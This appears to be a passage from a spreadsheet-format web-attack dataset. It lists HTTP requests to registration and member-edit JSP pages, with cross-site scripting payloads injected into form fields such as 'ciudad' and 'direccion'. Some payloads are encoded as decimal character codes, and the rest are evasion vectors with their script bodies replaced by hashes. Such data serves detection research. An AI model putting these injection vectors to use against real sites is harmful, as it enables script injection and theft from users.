100,99,51,41,59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79,66,74,69,67,84,32,99,108,97,115,115,105,100,61,99,108,115,105,100,58,46,46,46,34,32,99,111,100,101,98,97,115,101,61,34,106,97,118,97,115,99,114,105,112,116,58,101,52,49,48,48,48,99,100,53,50,53,98,99,57,101,57,49,54,101,99,98,52,52,52,54,48,50,102,49,51,48,99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15,116,121,108,101,62,60,33,45,45,60,47,115,116,121,108,101,62,60,83,67,82,73,80,84,62,97,49,97,54,52,54,50,56,49,51,55,101,54,54,99,52,48,51,53,102,48,57,99,49,55,56,101,55,50,49,50,99,47,47,45,45,62,60,47,83,67,82,73,80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33,91,67,68,65,84,65,91,60,33,45,45,93,93,60,83,67,82,73,80,84,62,97,56,102,48,53,57,100,53,99,50,50,99,102,102,53,51,48,102,50,53,100,49,97,56,51,53,100,52,51,57,100,51,47,47,45,45,62,60,47,83,67,82,73,80,8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33,45,45,32,45,45,32,45,45,62,102,97,101,56,101,55,98,102,49,99,49,101,99,51,48,53,97,100,98,98,56,102,101,51,53,101,49,56,53,51,55,53,60,33,45,45,32,45,45,32,45,4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20,109,108,32,105,100,61,34,88,34,62,60,97,62,60,98,62,50,99,52,54,98,97,50,48,51,51,101,56,102,50,52,97,55,98,51,53,100,102,48,53,50,98,102,54,53,56,51,52,59,60,98,62,60,47,97,62,60,47,120,109,108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0,105,118,32,100,97,116,97,102,108,100,61,34,98,34,32,100,97,116,97,102,111,114,109,97,116,97,115,61,34,104,116,109,108,34,32,100,97,116,97,115,114,99,61,34,35,99,49,57,51,51,100,101,48,98,98,102,100,50,57,49,49,48,100,100,50,51,50,50,98,50,97,52,51,98,101,56,57,34,62,60,47,100,105,118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88,77,76,32,73,68,61,73,62,60,88,62,60,67,62,60,33,91,67,68,65,84,65,91,60,73,77,71,32,83,82,67,61,34,106,97,118,97,115,93,93,60,33,91,67,68,65,84,65,91,99,114,105,112,116,58,50,55,101,57,57,98,49,50,54,100,52,101,101,102,50,49,98,99,56,57,51,57,56,54,57,54,50,53,50,57,55,97,34,62,93,93,60,47,67,62,60,88,62,60,47,120,109,108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2,111,114,109,32,105,100,61,34,116,101,115,116,34,32,47,62,60,98,117,116,116,111,110,32,102,111,114,109,61,34,116,101,115,116,34,32,102,111,114,109,97,99,116,105,111,110,61,34,106,97,118,97,115,99,114,105,112,116,58,48,48,53,99,55,52,56,50,99,49,50,97,48,55,97,101,100,52,52,98,48,53,53,101,97,101,54,102,102,54,56,51,34,62,88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10,112,117,116,32,111,110,102,111,99,117,115,61,106,97,118,97,115,99,114,105,112,116,58,53,50,50,100,53,55,56,98,56,102,55,53,55,101,53,50,101,98,101,56,50,54,51,101,98,102,98,48,56,101,48,48,32,97,117,116,111,102,111,99,117,11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15,101,108,101,99,116,32,111,110,102,111,99,117,115,61,106,97,118,97,115,99,114,105,112,116,58,57,51,57,51,54,56,101,98,101,52,50,57,100,50,55,101,50,54,98,57,102,98,97,51,50,97,51,97,53,57,51,101,32,97,117,116,111,102,111,99,117,11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16,101,120,116,97,114,101,97,32,111,110,102,111,99,117,115,61,106,97,118,97,115,99,114,105,112,116,58,50,55,101,102,50,49,98,102,50,51,53,101,52,54,99,102,56,97,50,102,99,102,52,54,55,102,51,102,53,102,97,56,32,97,117,116,111,102,111,99,117,11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7,101,121,103,101,110,32,111,110,102,111,99,117,115,61,106,97,118,97,115,99,114,105,112,116,58,53,56,54,97,51,55,100,100,53,102,101,51,48,54,55,49,53,102,54,54,54,49,98,102,98,102,55,102,56,52,52,54,32,97,117,116,111,102,111,99,117,11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05,110,112,117,116,32,111,110,98,108,117,114,61,106,97,118,97,115,99,114,105,112,116,58,50,98,99,52,100,50,56,57,54,100,57,53,98,54,48,57,53,52,52,48,52,55,54,99,99,97,100,53,101,54,56,49,32,97,117,116,111,102,111,99,117,115,62,60,105,110,112,117,116,32,97,117,116,111,102,111,99,117,11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18,105,100,101,111,32,112,111,115,116,101,114,61,106,97,118,97,115,99,114,105,112,116,58,101,98,56,97,97,98,102,53,48,49,54,99,97,97,50,56,100,97,102,97,50,52,50,55,53,102,56,97,102,100,57,57,47,47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98,111,100,121,32,111,110,115,99,114,111,108,108,61,99,50,54,98,54,50,54,57,97,56,48,57,52,102,98,98,97,57,102,52,98,101,54,51,50,99,57,98,51,98,48,97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88,60,102,111,114,109,32,105,100,61,116,101,115,116,32,111,110,102,111,114,109,105,110,112,117,116,61,106,97,118,97,115,99,114,105,112,116,58,48,99,53,101,51,53,51,97,97,100,57,99,100,54,57,53,98,97,98,52,49,55,48,102,49,56,102,49,52,97,102,54,62,60,105,110,112,117,116,62,60,47,102,111,114,109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88,60,102,111,114,109,32,105,100,61,116,101,115,116,62,60,105,110,112,117,116,62,60,47,102,111,114,109,62,60,98,117,116,116,111,110,32,102,111,114,109,61,116,101,115,116,32,111,110,102,111,114,109,99,104,97,110,103,101,61,61,106,97,118,97,115,99,114,105,112,116,58,50,99,100,52,97,50,49,101,54,55,55,49,97,54,49,52,51,51,52,100,99,53,54,97,102,98,101,97,50,102,50,97,62,88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18,105,100,101,111,62,60,115,111,117,114,99,101,32,111,110,101,114,114,111,114,61,34,106,97,118,97,115,99,114,105,112,116,58,57,56,51,57,97,57,98,99,53,52,56,101,56,99,48,50,53,55,48,55,56,50,102,56,99,50,55,57,98,56,102,56,34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60,118,105,100,101,111,32,111,110,101,114,114,111,114,61,34,106,97,118,97,115,99,114,105,112,116,58,48,98,52,53,97,56,97,57,53,97,48,99,51,102,99,54,100,97,48,52,57,57,102,102,52,102,100,51,48,56,49,101,34,62,60,115,111,117,114,99,101,62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'';!--"&lt;02e64016a81202dc6a3faeeed210780f&gt;=&amp;{()}"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title&gt;7387613b3ff27c6f5dd2573e20e87011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"&gt;&lt;imgsrc="x:x"onerror="9c4e05e5e0adc546311c099a296d84c7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bodyonload!#$%&amp;()*~+-_.,:;?@[|\\]^`=9c460d6165ce3ffb593e9ca83998da6d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'';!--"&lt;218195482e2b3ec911e6613ea412e156&gt;=&amp;{()}"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"2336a3983d629f1ca31acdef2aa8d5fd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7adccaf7b41be140661ea8b02f0b7454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`b41e70b5f16256853a21d77e4b3866f4`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"""&gt;9afca98756c3bc11ca35ce78640eeea2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"&amp;#14;94b8c0fae6c637320a2b47188c9dce09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divstyle="behaviour:url(f256d70954d312c1f4d3f3c663eaad15);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&lt;script&gt;300da102803fc52e170a9dfead8cb23d/&lt;&lt;/script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";815a4ce92c76e768da16db9ddb02cae4/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'db252739a1e1b379f909ff1ff486ac8a'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bodybackground="80bdf9e3a50d1ed9c33373ac76ae5af6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nputtype="image"src="fdd2f9424b7ae879b481062f856977ba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bodyonload=6eb2e6810d0aee1dad99f2798195d1c8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dynsrc="a40b8340f698ce769463bf7e63dd9c0b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lowsrc="e7783f0f5ee451777019e242f54f1a26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bgsoundsrc="8450122a821b16179a215c96ab120b42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brsize="&amp;{7e010a93086e574916fe7dc5278679c8}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linkrel="stylesheet"href="eef2b718d96c956fc0340d3bf8cdb68d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'vbscript:4cf5438b5627637f2c561da6c8d1318c'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"mocha:[afbcb51d463295d9f1db863509fb6094]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"livescript:[00e7cf700c50aee3cc872211baa406ee]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metahttp-equiv="refresh"content="0;url=418d3de6fbb490bda18b50aa24eb1f79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tablebackground="931a7a9cc25f4b0a939d3a2ba9958fe3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tablebackground=javascript:054685e14b7868f39c0368c7b35853f6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table&gt;&lt;tdbackground="4493723a286ea528efd4ef1ce9228e6e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divstyle="background-image:url(852fff6bad2fb2670a337440d2364cd2);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divstyle="width:expression(a7880413f8056cfb1c0af94592a481a0);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framesrc="c1c3d08c24bd9a02e7c406aa32699b85"&gt;&lt;ifram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frame/onload=6f321314abfe38faeb9e9195ead2258d&gt;&lt;/ifram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frame"onload=77090b9f3c3eb85bf13dbce59f2718ed&gt;&lt;/ifram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frame//////onload=7fc8ee60e22d6c3699578e30fe8271e8&gt;&lt;/ifram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frame"onload=be05a48a2dec596e31ce7ebcfaeea460&gt;&lt;ifram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frame"onload=8a5f088695de7eb0428661dd73d40893&gt;&lt;/ifram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frame&lt;?phpechochr(11)?&gt;onload=86a319ad9005c60c1be436e5550b0f6c&gt;&lt;ifram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frame&lt;?phpechochr(12)?&gt;onload=f903bb32204a0aebd8326521c608d797&gt;&lt;ifram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frameset&gt;&lt;framesrc="64f0a780f08261bcee23a0a52424140b"&gt;&lt;frameset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table&gt;&lt;tdbackground="29d5d9e0bc3e114d725cd5f4e70fc8d5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divstyle="background-image:url(&amp;#1;d3013d8b9b7071b9b50263c58530a101)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divstyle="width:expression(50dc8119a92244a8209141f1b2429637);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tyle="xss:expr*c67d49afcea58e0f80b92f8f7bff3ca9*/ession(c67d49afcea58e0f80b92f8f7bff3ca9)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5ab7a923313480a98f293c11b7ab8d18style="xss:expression(5ab7a923313480a98f293c11b7ab8d18)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tyletype="textjavascript"&gt;5d20dbe5c593b35bc46ad8101faaa603&lt;/styl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tyle&gt;.47148a4dcc6c5f84343d0f71e96bb135{background-image:url("47148a4dcc6c5f84343d0f71e96bb135");}&lt;style&gt;&lt;aclass=47148a4dcc6c5f84343d0f71e96bb135&gt;&lt;/a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tyletype="textcss"&gt;body{background:url("d1e8ac2c9ae12a024f694900ed736e1a")}&lt;/style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!--[ifgteie4]&gt;5fdde5cff4fd6dad2175521f320fb7b0&lt;![endif]--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basehref="aeb809468e57eece42fec2fd45c58276/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objectclassid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389&gt;&lt;paramname=urlvalue=080be78c0b8207f83721e5add9bd2e7d&gt;&lt;object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a="get";b="url("";c="javascript:";d="12bff33005229583888ff9677d3d5526")";eval(a+b+c+d)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?echo('&lt;scr)';echo('ipt&gt;f1ea30edc9315ac2c351cbdc9c73896e&lt;script&gt;');?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metahttp-equiv="set-cookie"content="userid=&amp;lt;script&amp;gt;5f46ee21eac276862c4ba266bb197b12&amp;lt;script&amp;gt;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criptsrc=http:/127.0.0.1&gt;58ba92aef98f9c791b1a4d6995bf7c95&lt;/script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"&amp;14;javascript:b46f5424377028da18c3f1bdb2e1e5ce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"jav&amp;#x0d;ascript:c1312d6a02ae23cf49e3faf59712ac49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---&lt;imgsrc="&amp;#14;36b11f85ba07a1d0515a43dc4770ab5f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---&lt;imgsrc="865db821cc3b159ddc556e80600b3531"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cript&gt;a=33dd3be0008304cec78ccb5e0322f190/alert(a.source)&lt;/script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---";d7d126b24913fc2ed6df4463489008b4;/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metahttp-equivo"refresh"content="0;url=http:/;url=d94d3cb2658619e85e92b7de8be1eb63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cript&lt;b&gt;=39c360ff71f88fa664caaccbb491ef51"&gt;&lt;script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framesrc="javascript:1db441b09826d26fd69deab69a5a047d&l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cript&gt;a=6dc9f3286fe9020b13018d9f3e846a46/n6dc9f3286fe9020b13018d9f3e846a46&lt;/script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layersrc="javascript:becb305c5cf06ee1b37e874d75586cae&gt;&lt;layer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tyle&gt;li{list-style-image:url("89e1516c62a079097bdd1be51771101b&lt;style&gt;&lt;ul&gt;&lt;li&gt;89e1516c62a079097bdd1be51771101b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divstyle="background-image:url(&amp;#1;javascript:0bd2c6d00d22be87a139810930f235ef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head&gt;&lt;metahttp-equiv="content-type"content="texthtml;charset=utf-7"&gt;&lt;/head&gt;+adw-script+ad4-495f25eee211c38c1c1e3070396ae335+adw-/script+ad4-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ahref="javascript#f36aa3213c09012aefcb7978576cdaa4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nputtype="image"dynsrc="4ce00e1bbb24f21c7708a9688449d959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amp;18148698bf843465c0b9ceebdbe6f31a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amp;{2020086309e1e0a91752f6bd7f1f03dd}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mgsrc=&amp;{4fb40d8512f3f1a72139a7996701191a};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ahref="about:b8557e8ed2236f9a0ed1b5698a4016a8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divstyle="binding:url(javascript:a8722e21fe087534bed0b159666e9608);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objectclassid=clsid:..."codebase="javascript:87d459e8f38c5a29f2385082ddd89656"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tyle&gt;&lt;!--&lt;style&gt;&lt;script&gt;11840b26cccb0e6a04a45f5819791718//--&gt;&lt;/script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![cdata[&lt;!--]]&lt;script&gt;8734e90183812c286da5dfb2961e1682/--&gt;&lt;/script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!------&gt;5a53002537a5189a48b4bd9f520b87b8&lt;!------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xmlid="x"&gt;&lt;a&gt;&lt;b&gt;45ceef2000eb8d800c9fbf881602dd0a;&lt;b&gt;&lt;a&gt;&lt;/xml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divdatafld="b"dataformatas="html"datasrc="#8326b4598c6a40f2cd5a1f659f22f8f0"&gt;&lt;div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xmlid=i&gt;&lt;x&gt;&lt;c&gt;&lt;![cdata[&lt;imgsrc="javas]]&lt;![cdata[cript:8fc9c988ed602b9136a1aafe843231a9"&gt;]]&lt;c&gt;&lt;x&gt;&lt;/xml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formid="test"&gt;&lt;buttonform="test"formaction="javascript:0beae2245ca049bba7009a72d061eeb3"&gt;x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nputonfocus=javascript:b1449df2f4f60de867a56eedb8d3073aautofocus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selectonfocus=javascript:86de4799bfd0ed7fcf28bdd2bfef44f9autofocus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textareaonfocus=javascript:f5b21c0f37f03dbceee0b43e5b528e8fautofocus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keygenonfocus=javascript:c6c5fdfb2f9d024f4e4a517e498e7e1bautofocus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inputonblur=javascript:8d0e06e33f86a5831e0e8c7e9e6b1274autofocus&gt;&lt;inputautofocus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videoposter=javascript:5ffd3d051c5351bfbb35f52eb9a99a17/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bodyonscroll=d6289b6e64d7fb40869f52d7a023ca63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x&lt;formid=test&gt;&lt;input&gt;&lt;form&gt;&lt;buttonform=testonformchange==javascript:233333f77d2d02e8002b7606a6691010&gt;x</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=c2&amp;password=c2&amp;nombre=carlos&amp;apellidos=perez&amp;email=perez@yahoo.com&amp;dni=23453457z&amp;provincia=1&amp;cp=12354&amp;b1=confirmar&amp;ciudad=madrid&amp;ntc=1234567890123456&amp;direccion=&lt;videoonerror="javascript:b2e95df043081814e882786d5e683ff8"&gt;&lt;sourc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"&gt;b7d839471eb5a0b714d1b5604ddc299c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"&gt;&lt;script&gt;alert('5de06fc9e51dc84eb0e5fea53e3f7b47')&lt;scrip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'';!--"&lt;40688fd04d43f7d3771b70b61fa726e6&gt;=&amp;{()}"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title&gt;8e39aa8f35c7df80d61bceac093cc015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"&gt;&lt;imgsrc="x:x"onerror="57bf7eb86dd78b1554b38b367aae6860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bodyonload!#$%&amp;()*~+-_.,:;?@[|\\]^`=c0d82d872230b564dbed252bc1403fdf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'';!--"&lt;ea3848ddeea71ed5635c94fb2706749f&gt;=&amp;{()}"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"44635a71f2d096e68aae3c4bdbf8c047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09c8a2957fa85d3c1dfc9fd5bd239773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`7cb41beb06c81f644cadb371109a1ac0`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"""&gt;fa6815c3488568e493e6c4089c0fc5b2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"&amp;#14;9649f51e8b4b431f261dd693a997282e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divstyle="behaviour:url(74a6877d2f267aad28d1709b6a742e7a);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&lt;script&gt;fb4e618f4e65086a312b4ddd315c498b/&lt;&lt;/scrip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";6860b5e74f064d78ecf4c4bc2a0e73e1/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'9b1b8d0080e988fe43db62c1404a660c'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bodybackground="445bb7fe4c93396d823d56ac78281175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nputtype="image"src="b207b8c98d99cd1c523fe37b8474cebe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bodyonload=deb3a5b86a8dc49041665d0e0db24350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dynsrc="68c8b4b20ea16a8718871b7ef56f27f9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lowsrc="f1d06c4239002a9af3960eb247008b84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bgsoundsrc="8471f88185d6f18c34a388e58cdb3acb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brsize="&amp;{3262f331b1bb1f5a79de6579ebd7cc82}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linkrel="stylesheet"href="7ae761f95b4058d0eb355301bd48074f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'vbscript:31179b20d7654c3cc27cb7149e2abf6a'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"mocha:[f767ae970ad59fc1235cf2829f308859]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"livescript:[067c400bbe37fe2ed0d79e73dbed1894]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metahttp-equiv="refresh"content="0;url=506170549ad1d59334360bab3bf0999c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tablebackground="9291752fa8aa325269e009c568349b60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tablebackground=javascript:44957a4261a9789b8934f18bbc4e610d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table&gt;&lt;tdbackground="c8eb6ad7522906aa798b71c8111896ca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divstyle="background-image:url(dee8207c4de0f6a55d0eca071e7a6ddb);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divstyle="width:expression(7e9506cd5a3caa7e4ad183262eb136ff);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framesrc="d024705b21f41d740d10bd355635c05c"&gt;&lt;ifram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frame/onload=8366f5cb70329af94aa3ceb882bba28d&gt;&lt;/ifram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frame"onload=05b6aecb27d4886f17d0ef86d73d9aca&gt;&lt;/ifram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frame//////onload=bb18cdc3f9bd6e157b42795f0e462fff&gt;&lt;/ifram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frame"onload=bfea38c160ab5a0e7f1aa3dac32b89d4&gt;&lt;ifram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frame"onload=ff3bfa8b624b2ad81c63daf5af2a41bd&gt;&lt;/ifram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frame&lt;?phpechochr(11)?&gt;onload=d097902811bf844cfd76a5e9f952e3c1&gt;&lt;ifram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frame&lt;?phpechochr(12)?&gt;onload=3262f2c629db05727a92cdbf8f146903&gt;&lt;ifram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frameset&gt;&lt;framesrc="f4f79810350ef84cafcdeb9708fbb6a9"&gt;&lt;framese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tablebackground="e820d9ab53b52a47602661258e293220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table&gt;&lt;tdbackground="78826793b4d42218360d8f8f08e39061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divstyle="background-image:url(&amp;#1;84e8d4f50c29579c4d72e22a3714201e)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divstyle="width:expression(c06b45ee2629503100c603035760654f);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tyle="xss:expr*51921ce12d1f46beb7864ac464ef8e39*/ession(51921ce12d1f46beb7864ac464ef8e39)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79c8c4f101808975be1e903d25095ac0style="xss:expression(79c8c4f101808975be1e903d25095ac0)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tyletype="textjavascript"&gt;b4827419cb3e8269fde4298598db7b44&lt;/styl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tyle&gt;.d2e7dcd9f2cb4ae20c0da49db2fcd9f7{background-image:url("d2e7dcd9f2cb4ae20c0da49db2fcd9f7");}&lt;style&gt;&lt;aclass=d2e7dcd9f2cb4ae20c0da49db2fcd9f7&gt;&lt;/a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tyletype="textcss"&gt;body{background:url("039d07814c8ebb1d5e5ef0ee8be62675")}&lt;/style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!--[ifgteie4]&gt;3985fb76c79f63362642cf49c255580f&lt;![endif]--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basehref="5e36e4192c506b46b230fdf4c339a474/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objectclassid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389&gt;&lt;paramname=urlvalue=5aa5ac78b476537389b9718fd6e529b6&gt;&lt;objec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a="get";b="url("";c="javascript:";d="5ff4072ac80b8dbe32d7946209a1b232")";eval(a+b+c+d)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?echo('&lt;scr)';echo('ipt&gt;47f8db775685be594732f5cf53e90407&lt;script&gt;');?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metahttp-equiv="set-cookie"content="userid=&amp;lt;script&amp;gt;2d379e379e9f2abc95cbfab81545af5f&amp;lt;script&amp;gt;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criptsrc=http:/127.0.0.1&gt;3084810d046ff62988e1f3ab4a096b9d&lt;/scrip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"&amp;14;javascript:27315f4f3cc38824805e149df1604b1f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"jav&amp;#x0d;ascript:b72ac13808468d68d86836c743c72c9c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---&lt;imgsrc="&amp;#14;2af3035efc46945639ac67f094e15166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---&lt;imgsrc="a4b276a8d0b83d813f6968e129cd32f8"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cript&gt;a=699aa348eea7f16116b64bbdcf6e8830/alert(a.source)&lt;/scrip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---";a67cd6b2d3965883b3a77accd652be4b;/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metahttp-equivo"refresh"content="0;url=http:/;url=5a0de1973225f7f25420e2177a0bea3b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cript&lt;b&gt;=785a71624e2e9e4eeda105731ad4fa3b"&gt;&lt;scrip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framesrc="javascript:66dd46fe5c43cfa9e897c4d77e6de1fe&l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cript&gt;a=3e8833d85cb5b86bc25b0b9916b700eb/n3e8833d85cb5b86bc25b0b9916b700eb&lt;/scrip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layersrc="javascript:0a6247c86a4a6522db1bc9520015da39&gt;&lt;layer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tyle&gt;li{list-style-image:url("aa766921b4e1fb74b70ac2e3f151fece&lt;style&gt;&lt;ul&gt;&lt;li&gt;aa766921b4e1fb74b70ac2e3f151fece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divstyle="background-image:url(&amp;#1;javascript:c3d12facbb358c908249eacef45b2ef2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head&gt;&lt;metahttp-equiv="content-type"content="texthtml;charset=utf-7"&gt;&lt;/head&gt;+adw-script+ad4-7353cae8a2c44f4d0369a38c1e4de1df+adw-/script+ad4-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ahref="javascript#2d41be04436a444046d5d00b9995c7d4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nputtype="image"dynsrc="d4da57d248dc14a56eb01ddf5bac65b9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amp;862eef4cba4f196e63f154399acd213e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amp;{78e751d357232c2b3f023d5308befcdd}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mgsrc=&amp;{401821da0fe9e91f3e78b768103801cf};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ahref="about:b41a3802f63bc014af1bbf556ad3e616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divstyle="binding:url(javascript:0a1a14685ce4ced852ebd38c15ab43ee);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objectclassid=clsid:..."codebase="javascript:56ab5bc6ea9054f24bd25d8b619c6e72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tyle&gt;&lt;!--&lt;style&gt;&lt;script&gt;87c4b23257718d81e247652470cfeee8//--&gt;&lt;/scrip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![cdata[&lt;!--]]&lt;script&gt;647b667e15f30bcce03158775390b40c/--&gt;&lt;/script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!------&gt;0e0561715440ecd37b411b2b2b388dd7&lt;!------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xmlid="x"&gt;&lt;a&gt;&lt;b&gt;196b31786969b4f03d9f76cb27448ead;&lt;b&gt;&lt;a&gt;&lt;/xml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divdatafld="b"dataformatas="html"datasrc="#c63b85c623cc7bb05cfa23e1d554bf89"&gt;&lt;div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xmlid=i&gt;&lt;x&gt;&lt;c&gt;&lt;![cdata[&lt;imgsrc="javas]]&lt;![cdata[cript:7e0c6261f33ce140e917e0e2fa0dc693"&gt;]]&lt;c&gt;&lt;x&gt;&lt;/xml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formid="test"&gt;&lt;buttonform="test"formaction="javascript:b13365e45e28b7291148ba53e6359fe1"&gt;x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nputonfocus=javascript:aad5b001ac37fb11fd7750119e4e7b7cautofocus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selectonfocus=javascript:eec6b3e98711a6bf297bea2f2aed553aautofocus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textareaonfocus=javascript:23b68618ca1008dc94616bb6c78af501autofocus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keygenonfocus=javascript:d423b2549f126aee21a0875fe82690c4autofocus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inputonblur=javascript:18683994f28961e0929995a3379476c1autofocus&gt;&lt;inputautofocus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videoposter=javascript:5b7b84c513a9021be47791c832e130f9/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bodyonscroll=3965f6e5c1ad59a787f4c4d7beb437ca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x&lt;formid=testonforminput=javascript:caf23aa2e0e1d3d23192a0d71196bdf6&gt;&lt;input&gt;&lt;form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x&lt;formid=test&gt;&lt;input&gt;&lt;form&gt;&lt;buttonform=testonformchange==javascript:151e9d9ff3b32cd22f8db3c48d36603b&gt;x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video&gt;&lt;sourceonerror="javascript:c3bc8f1889aeb74b788ef4a32f712726"&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?modo=registro&amp;login=c2&amp;password=c2&amp;nombre=carlos&amp;email=perez@yahoo.com&amp;dni=23453457z&amp;provincia=1&amp;cp=12354&amp;ntc=1234567890123456&amp;b1=registrar&amp;direccion=pez,2&amp;ciudad=madrid&amp;apellidos=&lt;videoonerror="javascript:0e9b74195f2736114b2f88b93a26f734"&gt;&lt;source&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?modo=registro&amp;login=c2&amp;password=c2&amp;nombre=c&amp;apellidos=c&amp;email=c&amp;dni=234534576&amp;provincia=1&amp;cp=12354&amp;ntc=13&amp;b1=registrar&amp;direccion=c&amp;ciudad="&gt;3d511abd43a77161e656e89034ff521e</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?modo=registro&amp;login=c2&amp;password=c2&amp;nombre=c&amp;apellidos=c&amp;email=c&amp;dni=234534576&amp;provincia=1&amp;cp=12354&amp;ntc=13&amp;b1=registrar&amp;direccion=c&amp;ciudad="&gt;&lt;script&gt;alert('9a1cb3716bea0a5c7414da8e366a088f')&lt;script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?modo=registro&amp;login=c2&amp;password=c2&amp;nombre=c&amp;apellidos=c&amp;email=c&amp;dni=234534576&amp;provincia=1&amp;cp=12354&amp;ntc=13&amp;b1=registrar&amp;direccion=c&amp;ciudad='';!--"&lt;871da13a0e6a492d4237295849d6d2de&gt;=&amp;{()}"</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?modo=registro&amp;login=c2&amp;password=c2&amp;nombre=c&amp;apellidos=c&amp;email=c&amp;dni=234534576&amp;provincia=1&amp;cp=12354&amp;ntc=13&amp;b1=registrar&amp;direccion=c&amp;ciudad=&lt;title&gt;06e62d2c6faf4e9a454a82d4fc145def</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?modo=registro&amp;login=c2&amp;password=c2&amp;nombre=c&amp;apellidos=c&amp;email=c&amp;dni=234534576&amp;provincia=1&amp;cp=12354&amp;ntc=13&amp;b1=registrar&amp;direccion=c&amp;ciudad="&gt;&lt;imgsrc="x:x"onerror="2dacecc8c361944e5b32428ce7c7505e"&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?modo=registro&amp;login=c2&amp;password=c2&amp;nombre=c&amp;apellidos=c&amp;email=c&amp;dni=234534576&amp;provincia=1&amp;cp=12354&amp;ntc=13&amp;b1=registrar&amp;direccion=c&amp;ciudad=&lt;bodyonload!#$%&amp;()*~+-_.,:;?@[|\\]^`=d58b0befefd71b5edda6c8fa086ed1e6&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?modo=registro&amp;login=c2&amp;password=c2&amp;nombre=c&amp;apellidos=c&amp;email=c&amp;dni=234534576&amp;provincia=1&amp;cp=12354&amp;ntc=13&amp;b1=registrar&amp;direccion=c&amp;ciudad='';!--"&lt;6e2ed1fc0d86d37bd3cf5ba97ca6f426&gt;=&amp;{()}"</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?modo=registro&amp;login=c2&amp;password=c2&amp;nombre=c&amp;apellidos=c&amp;email=c&amp;dni=234534576&amp;provincia=1&amp;cp=12354&amp;ntc=13&amp;b1=registrar&amp;direccion=c&amp;ciudad=&lt;imgsrc="4fd04821a36dd86379d76412e3ae22eb"&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?modo=registro&amp;login=c2&amp;password=c2&amp;nombre=c&amp;apellidos=c&amp;email=c&amp;dni=234534576&amp;provincia=1&amp;cp=12354&amp;ntc=13&amp;b1=registrar&amp;direccion=c&amp;ciudad=&lt;imgsrc=76883e30fbeaaf0ab1409856291c5dc5&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?modo=registro&amp;login=c2&amp;password=c2&amp;nombre=c&amp;apellidos=c&amp;email=c&amp;dni=234534576&amp;provincia=1&amp;cp=12354&amp;ntc=13&amp;b1=registrar&amp;direccion=c&amp;ciudad=&lt;imgsrc=`bc6974c86a96f2033e00666cda8d7a5b`&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?modo=registro&amp;login=c2&amp;password=c2&amp;nombre=c&amp;apellidos=c&amp;email=c&amp;dni=234534576&amp;provincia=1&amp;cp=12354&amp;ntc=13&amp;b1=registrar&amp;direccion=c&amp;ciudad=&lt;img"""&gt;23af12b62cee500d0b24b2108343daf0"&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?modo=registro&amp;login=c2&amp;password=c2&amp;nombre=c&amp;apellidos=c&amp;email=c&amp;dni=234534576&amp;provincia=1&amp;cp=12354&amp;ntc=13&amp;b1=registrar&amp;direccion=c&amp;ciudad=&lt;imgsrc="&amp;#14;8f79cd01707fb59116cf8cf71e81a907"&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?modo=registro&amp;login=c2&amp;password=c2&amp;nombre=c&amp;apellidos=c&amp;email=c&amp;dni=234534576&amp;provincia=1&amp;cp=12354&amp;ntc=13&amp;b1=registrar&amp;direccion=c&amp;ciudad=&lt;divstyle="behaviour:url(cea95b3548862cab46774e90987ec62b);"&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?modo=registro&amp;login=c2&amp;password=c2&amp;nombre=c&amp;apellidos=c&amp;email=c&amp;dni=234534576&amp;provincia=1&amp;cp=12354&amp;ntc=13&amp;b1=registrar&amp;direccion=c&amp;ciudad=&lt;&lt;script&gt;7f78da3dfaede690a01d23ff742134d7/&lt;&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?modo=registro&amp;login=c2&amp;password=c2&amp;nombre=c&amp;apellidos=c&amp;email=c&amp;dni=234534576&amp;provincia=1&amp;cp=12354&amp;ntc=13&amp;b1=registrar&amp;direccion=c&amp;ciudad=";7e70b8b2e91414d0602b0db880df0f9e/</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?modo=registro&amp;login=c2&amp;password=c2&amp;nombre=c&amp;apellidos=c&amp;email=c&amp;dni=234534576&amp;provincia=1&amp;cp=12354&amp;ntc=13&amp;b1=registrar&amp;direccion=c&amp;ciudad=&lt;imgsrc='bff05d099bf6a3503aee6851ac66f25e'</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?modo=registro&amp;login=c2&amp;password=c2&amp;nombre=c&amp;apellidos=c&amp;email=c&amp;dni=234534576&amp;provincia=1&amp;cp=12354&amp;ntc=13&amp;b1=registrar&amp;direccion=c&amp;ciudad=&lt;bodybackground="52aca7658d5ddbbb796d4ffdec54ceb7"&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?modo=registro&amp;login=c2&amp;password=c2&amp;nombre=c&amp;apellidos=c&amp;email=c&amp;dni=234534576&amp;provincia=1&amp;cp=12354&amp;ntc=13&amp;b1=registrar&amp;direccion=c&amp;ciudad=&lt;inputtype="image"src="a9248c0f5e24b76ce3618d7401efcd58"&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?modo=registro&amp;login=c2&amp;password=c2&amp;nombre=c&amp;apellidos=c&amp;email=c&amp;dni=234534576&amp;provincia=1&amp;cp=12354&amp;ntc=13&amp;b1=registrar&amp;direccion=c&amp;ciudad=&lt;bodyonload=8f39d6ce61731b51688aab52904c2b0f&gt;</t>
  </si>
  <si>
